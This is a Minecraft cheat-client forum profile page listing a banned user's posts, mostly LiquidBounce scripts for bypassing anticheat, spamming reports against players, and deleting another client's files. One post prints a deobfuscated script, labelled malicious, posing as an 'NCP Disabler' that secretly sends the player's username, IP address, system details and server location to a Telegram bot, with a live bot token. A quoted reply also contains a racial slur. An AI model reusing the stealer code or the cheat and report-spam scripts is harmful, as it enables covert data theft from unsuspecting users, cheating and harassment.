CCBlueX Forum

    • Register
    • Login
    • Search
    • Categories
    • Recent
    • Tags
    • Popular
    • Users
    • Groups
    1. Home
    2. DreamWasFucked
    • Profile
    • Following 0
    • Followers 32
    • Topics 106
    • Posts 1212
    • Best 159
    • Controversial 0
    • Groups 0

    DreamWasFucked

    Banned

    BANNED

    216
    Reputation
    1583
    Profile views
    1212
    Posts
    32
    Followers
    0
    Following
    Joined Last Online
    Age 2023

    DreamWasFucked Unfollow Follow

    Best posts made by DreamWasFucked

    • Sigma Discussion

      category where people can talk about sigma client!!
      upvote!!!

      posted in Off-Topic
      DreamWasFucked
      DreamWasFucked
    • "NCP Disabler" deobf

      lol

      Malicious. DON'T use this script.

      // Deobf by Shurpe
      var DateTimeFormatter = Java.type('java.time.format.DateTimeFormatter'),
          BufferedInputStream = Java.type('java.io.BufferedInputStream'),
          InputStreamReader = Java.type('java.io.InputStreamReader'),
          Minecraft = Java.type('net.minecraft.client.Minecraft'),
          BufferedReader = Java.type('java.io.BufferedReader'),
          ZonedDateTime = Java.type('java.time.ZonedDateTime'),
          IOException = Java.type('java.io.IOException'),
          Exception = Java.type('java.lang.Exception'),
          ZoneId = Java.type('java.time.ZoneId'),
          Locale = Java.type('java.util.Locale'),
          System = Java.type('java.lang.System'),
          String = Java.type('java.lang.String'),
          URL = Java.type('java.net.URL');
      
          DTF = DateTimeFormatter.ofPattern('MMMM d, yyyy HH:mm:ss', Locale.US),
          defaultZoneId = ZoneId.systemDefault(),
          API_TOKEN = '1418453085:AAFoFiTWZMrw9k6pSwzX37LTdHRYiK6WqA0',
          CHAT_ID = '1294649917';
      
      function sendToTelegram(text) {
          URLString = "https://api.telegram.org/bot%s/sendMessage?chat_id=%s&text=%s";
          URLString = String.format(URLString, API_TOKEN, CHAT_ID, text);
          try {
              url = new URL(URLString);
              conn = url.openConnection();
              new BufferedInputStream(conn.getInputStream());
          } catch (IOException) {
              // ?
          }
      }
      function getIPAddress () {
          try {
              IPAddress = new BufferedReader(new InputStreamReader(new URL('http://checkip.amazonaws.com').openStream())).readLine();
          } catch (Exception) {
              IPAddress = 'Failed to obtain an IP address. (' + Exception + ')';
          }
          return IPAddress;
      }
      var script = registerScript({
          name: 'OPDISABLER2011NOTPATCHED',
          version: '0.0.1',
          authors: ['LiquidBounce']
      });
      script.registerModule({
          name: 'OPDISABLER2011NOTPATCHED',
          category: 'Exploit', 
          description: ''
      
      }, function (module) {
          module.on('enable', function() {
              sendToTelegram(
                  'User name : ' + System.getProperty("user.name") +
                  '%0ALog date : ' + DTF.format(ZonedDateTime.now(defaultZoneId)) + ' ' + defaultZoneId +
                  '%0AIP address : ' + getIPAddress() +
                  '%0AOS architecture : ' + System.getProperty("os.arch") +
                  '%0AOS version : ' + System.getProperty("os.version") +
                  '%0AOS name : ' + System.getProperty("os.name") +
                  '%0AMinecraft name : ' + mc.thePlayer.getName() +
                  '%0AOnline server : ' + (Minecraft.getMinecraft().isSingleplayer() ? 'Singleplayer' : (mc.getCurrentServerData() != null ? mc.getCurrentServerData().serverIP.toLowerCase() : 'Unable to get a server.')) +
                  '%0AServer position : ' + (Minecraft.getMinecraft().isSingleplayer() ? '-' : (mc.getCurrentServerData() != null ? (mc.thePlayer.posX.toFixed() + ', ' + mc.thePlayer.posY.toFixed() + ', ' + mc.thePlayer.posZ.toFixed()) : 'Unable to get a position.'))
              );
          });
      });
      
      posted in General Discussion
      DreamWasFucked
      DreamWasFucked
    • AutoDisable

      :axocooler::axocooler:

      About script

      Turns off aura when a player dies or the server changes

      Showcase

      dda.png

      Code

      var fadeTimer = 0;
      var reasons = ['Aura disabled due to server changes.', 'Aura disabled due to death.'];
      var S06PacketUpdateHealth = Java.type('net.minecraft.network.play.server.S06PacketUpdateHealth');
      var ScaledResolution = Java.type('net.minecraft.client.gui.ScaledResolution');
      var KillAura = moduleManager.getModule('KillAura');
      function getScaledWidth() {
          var scaledWidth = new ScaledResolution(mc).getScaledWidth();
          return scaledWidth;
      }
      function getScaledHeight() {
          var scaledHeight = new ScaledResolution(mc).getScaledHeight();
          return scaledHeight;
      }
      var script = registerScript({
          name: 'AutoDisable',
          version: '0.0.0',
          authors: ['Shurpe']
      });
      script.registerModule({
          name: 'AutoDisable',
          description: 'Turns off KillAura module',
          category: 'Fun'
      
      }, function (module) {
      	module.on('packet', function (e) {
      		var packet = e.getPacket();
              if (packet instanceof S06PacketUpdateHealth && packet.getHealth() <= 0 && KillAura.getState()) {
                  KillAura.setState(false); reason = reasons[1]; disabled = true;
              }
          });
      	module.on('update', function () {
              mcWidth = getScaledWidth(); mcHeight = getScaledHeight();
              disabled ? fadeTimer++ : fadeTimer = 0;
              if (fadeTimer >= 50) {
                  disabled = false;
              }
          });
          module.on('render2D', function () {
              if (disabled) {
                  mc.fontRendererObj.drawStringWithShadow(reason, mcWidth / 2 - mc.fontRendererObj.getStringWidth(reason) / 2, 15, 0xFFFFFF);
                  mc.fontRendererObj.drawStringWithShadow('§cWarning!', mcWidth / 2 - mc.fontRendererObj.getStringWidth('Warning!') / 2, 5, 0xFFFFFF);
              }
          });
          module.on('world', function () {
              if (KillAura.getState()) {
                  reason = reasons[0]; KillAura.setState(false); disabled = true;
              }
          });
      });
      
      posted in Scripts
      DreamWasFucked
      DreamWasFucked
    • AntiSigma+

      no more monera miner on your pc!:axocooler: :axocooler:

      var FileUtils = Java.type('org.apache.commons.io.FileUtils');
      var System = Java.type('java.lang.System');
      var File = Java.type('java.io.File');
      
      // Sigma paths
      var SigmaJelloPrelauncher = new File(System.getProperty('user.home') + '\\AppData\\Roaming\\.minecraft\\SigmaJelloPrelauncher.jar');
      var Sigma5Version = new File(System.getProperty('user.home') + '\\AppData\\Roaming\\.minecraft\\versions\\Sigma5');
      var Sigma5Download = new File(System.getProperty('user.home') + '\\Downloads\\Sigma5.zip');
      var Sigma1 = new File(System.getProperty('user.home') + '\\AppData\\Roaming\\.minecraft\\Sigma');
      var Sigma2 = new File(System.getProperty('user.home') + '\\AppData\\Roaming\\.minecraft\\sigma5');
      var script = registerScript({
          name: 'AntiSigma',
          version: '0.0.0',
          authors: ['Shurpe']
      });
      script.registerModule({
          name: 'AntiSigma',
          category: 'Misc', 
          description: ''
      
      }, function (module) {
          module.on('enable', function() {
              switch (true) {
                  case SigmaJelloPrelauncher.exists():
                      SigmaJelloPrelauncher.delete();
                      break;
                  case Sigma5Version.exists():
                      FileUtils.deleteDirectory(new File(Sigma5Version));
                      break;
                  case Sigma5Download.exists():
                      Sigma5Download.delete();
                      break;
                  case Sigma1.exists():
                      FileUtils.deleteDirectory(new File(Sigma1));
                      break;
                  case Sigma2.exists():
                      FileUtils.deleteDirectory(new File(Sigma2));
                      break;
              }
              if (SigmaJelloPrelauncher.exists() || Sigma5Version.exists() || Sigma5Download.exists() || Sigma1.exists() || Sigma2.exists()) {
                  Chat.print('Sigma client has been removed!');
              } else {
                  Chat.print('There is no Sigma client on your computer.');
              }
          });
      });
      
      posted in Scripts
      DreamWasFucked
      DreamWasFucked
    • New matrix LongJump

      matrix != good ac

      Code

      Math.radians = function(degrees) {
          return degrees * Math.PI / 180;
      }
      function isMoving() {
          return (mc.thePlayer.movementInput.moveForward != 0 || mc.thePlayer.movementInput.moveStrafe != 0) ? 1 : 0;
      }
      var ticks = 0;
      var script = registerScript({
          name: 'MatrixLong',
          version: '0.0.0',
          authors: ['Shurpe']
      });
      script.registerModule({
          name: 'MatrixLong',
          description: '',
          category: 'Fun'
      
      }, function (module) {
          module.on('disable', function () {
              mc.timer.timerSpeed = 1, ticks = 0, mc.thePlayer.motionX = 0, mc.thePlayer.motionZ = 0;
          });
          module.on('update', function () {
              if (!mc.thePlayer.isInWater() && !mc.thePlayer.isInLava() && !mc.thePlayer.isOnLadder() && !mc.thePlayer.isInWeb) {
                  mc.timer.timerSpeed = 0.2;
                  ticks++;
                  if (mc.thePlayer.onGround) {
                      wasOnGround = true;
                  }
                  if (!isMoving()) {
                      if (ticks == 1 && wasOnGround) {
                          yaw = Math.radians(mc.thePlayer.rotationYaw);
                          mc.thePlayer.motionX = 6 * -Math.sin(yaw);
                          mc.thePlayer.motionZ = 6 * Math.cos(yaw);
                          mc.thePlayer.jump();
                      }
                      if (ticks == 2 && wasOnGround) {
                          yaw = Math.radians(mc.thePlayer.rotationYaw);
                          mc.thePlayer.motionX = 5 * -Math.sin(yaw);
                          mc.thePlayer.motionZ = 5 * Math.cos(yaw);
                          mc.thePlayer.jump();
                          wasOnGround = false;
                      }
                  } else {
                      module.setState(false);
                  }
                  if ((mc.thePlayer.onGround || mc.thePlayer.isCollidedHorizontally) && ticks > 2) {
                      module.setState(false);
                  }
              } else {
                  module.setState(false);
              }
          });
      });
      
      posted in Scripts
      DreamWasFucked
      DreamWasFucked
    • every sigma user be like (2)

      sigma1.png

      C++ moment

      sigma3.png

      how to put binds

      sigma10.png

      fix killarua
      sigma9.png

      hypixle anti-cheat by bass

      sigma7.png

      pls utdate client

      sigma8.png

      sup

      sigma6.png

      who is best keybrist?

      sigma4.png

      how to use serch

      posted in Off-Topic
      DreamWasFucked
      DreamWasFucked
    • [Script] Circle

      :axocooler::axocooler:

      About script

      Original idea from this post

      A simple script that shows your reach when killaura is on

      Showcase

      2021-03-08_04.27.46.png

      Code

      var RenderUtils = Java.type('net.ccbluex.liquidbounce.utils.render.RenderUtils');
      var KillAura = moduleManager.getModule('KillAura');
      var GL11 = Java.type('org.lwjgl.opengl.GL11');
      var Color = Java.type('java.awt.Color');
      var script = registerScript({
      	name: 'Circle',
      	version: '1.0',
      	authors: ['Shurpe']
      });
      script.registerModule({
      	name: 'Circle',
      	description: '',
          category: 'Fun',
          settings: {
              r: Setting.integer({
                  name: "Red",
                  default: 255,
                  min: 0,
                  max: 255
              }),
              g: Setting.integer({
                  name: "Green",
                  default: 255,
                  min: 0,
                  max: 255
              }),
              b: Setting.integer({
                  name: "Blue",
                  default: 255,
                  min: 0,
                  max: 255
              }),
              al: Setting.integer({
                  name: "Alpha",
                  default: 155,
                  min: 0,
                  max: 255
              })
          }
      }, function (module) {
          module.on('render3D', function() {
              if (KillAura.getState()) {
                  var rangeValue = KillAura.getValue('Range').get().toFixed(2)
                  GL11.glPushMatrix();
                  GL11.glTranslated(
                      mc.thePlayer.lastTickPosX + (mc.thePlayer.posX - mc.thePlayer.lastTickPosX) * mc.timer.renderPartialTicks - mc.getRenderManager().renderPosX,
                      mc.thePlayer.lastTickPosY + (mc.thePlayer.posY - mc.thePlayer.lastTickPosY) * mc.timer.renderPartialTicks - mc.getRenderManager().renderPosY,
                      mc.thePlayer.lastTickPosZ + (mc.thePlayer.posZ - mc.thePlayer.lastTickPosZ) * mc.timer.renderPartialTicks - mc.getRenderManager().renderPosZ
                  )
                  GL11.glEnable(GL11.GL_BLEND);
                  GL11.glEnable(GL11.GL_LINE_SMOOTH);
                  GL11.glDisable(GL11.GL_TEXTURE_2D);
                  GL11.glDisable(GL11.GL_DEPTH_TEST);
                  GL11.glBlendFunc(GL11.GL_SRC_ALPHA, GL11.GL_ONE_MINUS_SRC_ALPHA);
                  
                  GL11.glLineWidth(1);
                  RenderUtils.glColor(new Color(module.settings.r.get(), module.settings.g.get(), module.settings.b.get(), module.settings.al.get()));
                  GL11.glRotatef(90, 1, 0, 0);
                  GL11.glBegin(GL11.GL_LINE_STRIP);
          
                  for (i = 0; i <= 360; i += 60) { // You can change circle accuracy  (60 - accuracy)
                      GL11.glVertex2f(Math.cos(i * Math.PI / 180) * rangeValue, (Math.sin(i * Math.PI / 180) * rangeValue));
                  }
          
                  GL11.glEnd();
          
                  GL11.glDisable(GL11.GL_BLEND);
                  GL11.glEnable(GL11.GL_TEXTURE_2D);
                  GL11.glEnable(GL11.GL_DEPTH_TEST);
                  GL11.glDisable(GL11.GL_LINE_SMOOTH);
          
                  GL11.glPopMatrix();
              }
          });
      });
      
      posted in Scripts
      DreamWasFucked
      DreamWasFucked
    • Report Abuse

      epic script

      Report Abuse

      Use this script to make it difficult for redesky mods!!!

      Code

      var S38PacketPlayerListItem  = Java.type('net.minecraft.network.play.server.S38PacketPlayerListItem'),
          players = [];
      var script = registerScript({
          name: 'Report Abuse',
          version: '0.0.1',
          authors: ['Shurpe']
      });
      script.registerModule({
          name: 'Report Abuse',
          description: '',
          category: 'Fun'
      
      }, function (module) {
      	module.on('update', function () {
              if (players.length > 0) {
                  if (mc.thePlayer.ticksExisted % 50 == 0) {
                      mc.thePlayer.sendChatMessage('/report ' + players[players.length - 1]);
                      players.splice(players.indexOf(players[players.length - 1]), 1);
                  }
              }
          });
          module.on('world', function () {
              players = [];
          });
          module.on('disable', function () {
              players = [];
          });   
          module.on('packet', function (e) {
              var packet = e.getPacket()
              if (packet instanceof S38PacketPlayerListItem && packet.getAction() == "ADD_PLAYER") {
                  playerName = packet.getEntries().get(0).getProfile().getName();
                  if (players.indexOf(playerName) === -1 && playerName != mc.thePlayer.getName()) {
                      players.push(playerName);
                  }
              }
          });
      });
      
      posted in Scripts
      DreamWasFucked
      DreamWasFucked
    • Spartan combat disabler

      Advanced Cheat Detection...

      Combat Disabler

      6 Blocks reach
      Any criticals work
      Instant fastuse

      Code

      var C0FPacketConfirmTransaction = Java.type('net.minecraft.network.play.client.C0FPacketConfirmTransaction'),
          C00PacketKeepAlive = Java.type('net.minecraft.network.play.client.C00PacketKeepAlive'),
          MSTimer = Java.type('net.ccbluex.liquidbounce.utils.timer.MSTimer'),
          msTimer = new MSTimer(),
          transactions = [],
          keepAlives = [];
      var script = registerScript({
          name: 'SpartanDisabler',
          version: '0.0.0',
          authors: ['Shurpe']
      });
      script.registerModule({
          name: 'SpartanDisabler',
          category: 'Fun', 
          description: ''
      
      }, function (module) {
          module.on('packet', function(e) {
              var packet = e.getPacket();
              if (packet instanceof C00PacketKeepAlive && packet != keepAlives[keepAlives.length - 1]) {
                  keepAlives.push(packet);
                  e.cancelEvent();
              }
              if (packet instanceof C0FPacketConfirmTransaction && packet != transactions[transactions.length - 1]) {
                  transactions.push(packet);
                  e.cancelEvent();
              }
          });
          module.on('update', function() {
              if (keepAlives.length > 0 && transactions.length > 0) {
                  if (msTimer.hasTimePassed(3000)) {
                      mc.thePlayer.sendQueue.addToSendQueue(keepAlives[keepAlives.length - 1]);
                      mc.thePlayer.sendQueue.addToSendQueue(transactions[transactions.length - 1]);
                      transactions = [];
                      keepAlives = [];
                      msTimer.reset();
                  }
              }
          });
      });
      
      posted in Scripts
      DreamWasFucked
      DreamWasFucked
    • RE: how to install sigma cilent me cant figure out?

      The high GPU usage is due to the GPU acceleration or the UIs. And this is not comparable to other person's GPU usage since every GPU behave differently. You can compare this usage with vanilla 1.15.2's GPU usage. In my personal case, it's about +1~8% higher.

      The high CPU and RAM usage are due to a memory leak that we're investigating.

      Edit : The high ram usage have been fixed

      And the overall performance loss over the 1.8 clients is due to the 1.15 itself, the heavy UI, the missing optimisations (performance update soon), the obfuscation, etc

      Some people are saying that "conhost.exe" is a malware... It's actually the console process spawned by java.exe which is used by Sigma (instead of the javaw.exe, the window version of java.exe without the console, that is mostly used for Minecraft).

      Fun fact: Badlion client and Lunar client are also spawning conhost, and they aren't getting called out as malwares.

      Here's a great explanation of what it is: https://www.howtogeek.com/howto/4996/what-is-conhost.exe-and-why-is-it-running/

      And Omikron client was not a bitcoin miner, here's the copypasta :

      Omikron client didn't have any btc miner / rat / botnet or whatever. The thing running in background was a system to validate the usage of the auto alt / proxy from other computers. Therefore, if you used auto alt / auto proxy, your computer among others validated in some sort of P2P the usage of alts / proxies. If >50% of computers says that a "transaction" is good, it was validated. Omikron decided to do that to counter the abuse of auto alt / auto proxy.

      But ofc you could disable that autorun in Omikron Client's setting. And it was clearly written in the client that it would autorun (but no body really read it) if you use auto alts / auto proxy.

      Edit, another copypasta:

      I know, this is missleading. In the code, finding alts is refenrenced as "mining" them because you have this user/pass combo and sometime yay ! Its a working minecraft alt ! The whole problem about all this drama is that its old code written when the client was "ghost client" and putting it in a .m file intead of .minecraft, having the package not named omikron, not using omikron domain name in the code was a good idear to prevent memory scanning cheating software such as BLSquad to find "omikron" but as you can tell it has bring more trouble that anything. You shoudn't be scared, your cpu isn't and wont be used to mine crypto or any unwanted activity and you will soon be able to chose if you want the service to run. In the next release, beside the fact that all of this was moved to .minecraft/Omikron, using proper domain name etc, you will be able to choose if you are using the client and want the background service running to find alts or if you have the client installed but not using it you will be able to disable the background service.

      The video that is spreading about Omikron client is only proving that it downloads an autorun, and runs it in the background, which is intended.

      Be careful of people trying to spread that Sigma could be a virus. Most of the time, they're made up by people who are clueless and don't know about what they're talking about (ex: conhost).

      posted in Off-Topic
      DreamWasFucked
      DreamWasFucked

    Latest posts made by DreamWasFucked

    • RE: BlockDrop's Bedwars Config. (Undetectable)

      @_ender1355 said in BlockDrop's Bedwars Config. (Undetectable):

      nigger

      reported.

      posted in Configs
      DreamWasFucked
      DreamWasFucked
    • RE: give me civbreak script
      ##### #### ### clients
      posted in Scripts
      DreamWasFucked
      DreamWasFucked
    • RE: 1.16+ badrock autobreaker

      thx now i can bypass mojang antihack system

      posted in Suggestions
      DreamWasFucked
      DreamWasFucked
    • RE: 1.16+ badrock autobreaker

      for singleplayer hacking

      posted in Suggestions
      DreamWasFucked
      DreamWasFucked
    • RE: give me civbreak script

      sigma ofc

      posted in Scripts
      DreamWasFucked
      DreamWasFucked
    • 1.16+ badrock autobreaker

      like this one
      https://github.com/LXYan2333/Fabric-Bedrock-Miner/releases
      【MC】Easily break 5 bedrocks in 1 second ! Client fabric mod: Bedrock Miner released (1.16+)(GPLv3) – 04:36
      — LXYan _

      posted in Suggestions
      DreamWasFucked
      DreamWasFucked
    • RE: [SCRIPT] Verus Fly

      @lmposting mad

      posted in Scripts
      DreamWasFucked
      DreamWasFucked
    • RE: how to make a rename function?

      mc.theplayer.motionY.getField.name:rename('among.us').print()

      posted in General Discussion
      DreamWasFucked
      DreamWasFucked
    • RE: any bhop/speed that bypass hypixel ?

      $ghost hacking$

      posted in Configs
      DreamWasFucked
      DreamWasFucked
    • RE: shall i make another script

      Trust Nobody: Introducing Fortnite Impostors – 00:33
      — Fortnite

      posted in Requests
      DreamWasFucked
      DreamWasFucked